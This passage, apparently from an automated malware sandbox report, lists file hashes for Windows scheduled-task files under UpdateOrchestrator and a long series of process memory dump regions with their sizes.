                                                                                                                                                                        1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                        SHA1

                                                                                                                                                                        63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                        SHA256

                                                                                                                                                                        727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                        SHA512

                                                                                                                                                                        f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                                        SHA1

                                                                                                                                                                        5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                                        SHA256

                                                                                                                                                                        55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                                        SHA512

                                                                                                                                                                        5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                        SHA1

                                                                                                                                                                        9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                        SHA256

                                                                                                                                                                        a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                        SHA512

                                                                                                                                                                        c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                      • memory/216-1810-0x0000000000FC0000-0x000000000102C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/332-52-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/332-51-0x000001AA3AAC0000-0x000001AA3AAEA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/448-71-0x000001776E4D0000-0x000001776E4FA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/448-72-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/616-54-0x000001A2EA030000-0x000001A2EA05A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/616-55-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/616-44-0x000001A2EA000000-0x000001A2EA023000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        140KB

                                                                                                                                                                      • memory/672-47-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/672-46-0x000001DE34C70000-0x000001DE34C9A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/956-75-0x0000021FF56E0000-0x0000021FF570A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/956-76-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/960-57-0x0000024347BC0000-0x0000024347BEA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/960-58-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1040-83-0x0000014FAEB10000-0x0000014FAEB3A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1040-84-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1064-87-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1064-86-0x000002BCC6F70000-0x000002BCC6F9A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1164-671-0x0000000000EC0000-0x0000000000F2C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/1212-89-0x0000012354BB0000-0x0000012354BDA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1212-90-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1220-92-0x000001E280030000-0x000001E28005A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1220-93-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1328-96-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1328-95-0x0000021177290000-0x00000211772BA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1344-100-0x00007FFDDF650000-0x00007FFDDF660000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                      • memory/1344-99-0x000001E433FA0000-0x000001E433FCA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1392-109-0x00000264EC5A0000-0x00000264EC5CA000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        168KB

                                                                                                                                                                      • memory/1764-1052-0x0000000000C20000-0x0000000000C8C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2500-32-0x000001D9D6B10000-0x000001D9D6B4E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        248KB

                                                                                                                                                                      • memory/2500-33-0x00007FFE1F5D0000-0x00007FFE1F7C5000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        2.0MB

                                                                                                                                                                      • memory/2500-34-0x00007FFE1D820000-0x00007FFE1D8DE000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        760KB

                                                                                                                                                                      • memory/2500-39-0x000001D9F0FF0000-0x000001D9F1002000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        72KB

                                                                                                                                                                      • memory/2500-30-0x000001D9D6720000-0x000001D9D676E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        312KB

                                                                                                                                                                      • memory/2652-640-0x0000000000AC0000-0x0000000000B2C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/2780-1301-0x0000000000080000-0x00000000000EC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3436-909-0x0000000000C80000-0x0000000000CEC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3520-2-0x00000138E28C0000-0x00000138E28E2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        136KB

                                                                                                                                                                      • memory/3520-17-0x00007FFE00F30000-0x00007FFE019F1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/3520-14-0x00007FFE00F30000-0x00007FFE019F1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/3520-13-0x00007FFE00F30000-0x00007FFE019F1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/3520-12-0x00007FFE00F30000-0x00007FFE019F1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/3676-335-0x000001D7A6F30000-0x000001D7A70F2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.8MB

                                                                                                                                                                      • memory/3708-611-0x0000000000700000-0x000000000076C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3760-1139-0x0000000000050000-0x00000000000BC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3784-35-0x0000000140000000-0x0000000140040000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        256KB

                                                                                                                                                                      • memory/3784-42-0x0000000140000000-0x0000000140040000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        256KB

                                                                                                                                                                      • memory/3784-37-0x00007FFE1F5D0000-0x00007FFE1F7C5000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        2.0MB

                                                                                                                                                                      • memory/3784-38-0x00007FFE1D820000-0x00007FFE1D8DE000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        760KB

                                                                                                                                                                      • memory/3784-36-0x0000000140000000-0x0000000140040000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        256KB

                                                                                                                                                                      • memory/3788-362-0x0000000000530000-0x000000000059C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/3940-363-0x000001DD53C40000-0x000001DD54168000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        5.2MB

                                                                                                                                                                      • memory/4288-1084-0x0000000000FB0000-0x000000000101C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4452-1951-0x00000000009D0000-0x0000000000A3C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/4804-21-0x00007FFE00F30000-0x00007FFE019F1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/4804-0-0x00007FFE00F33000-0x00007FFE00F35000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/4804-41-0x00007FFE00F30000-0x00007FFE019F1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        10.8MB

                                                                                                                                                                      • memory/4804-1-0x0000000000570000-0x00000000005DC000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB

                                                                                                                                                                      • memory/5024-1389-0x0000000000B20000-0x0000000000B8C000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        432KB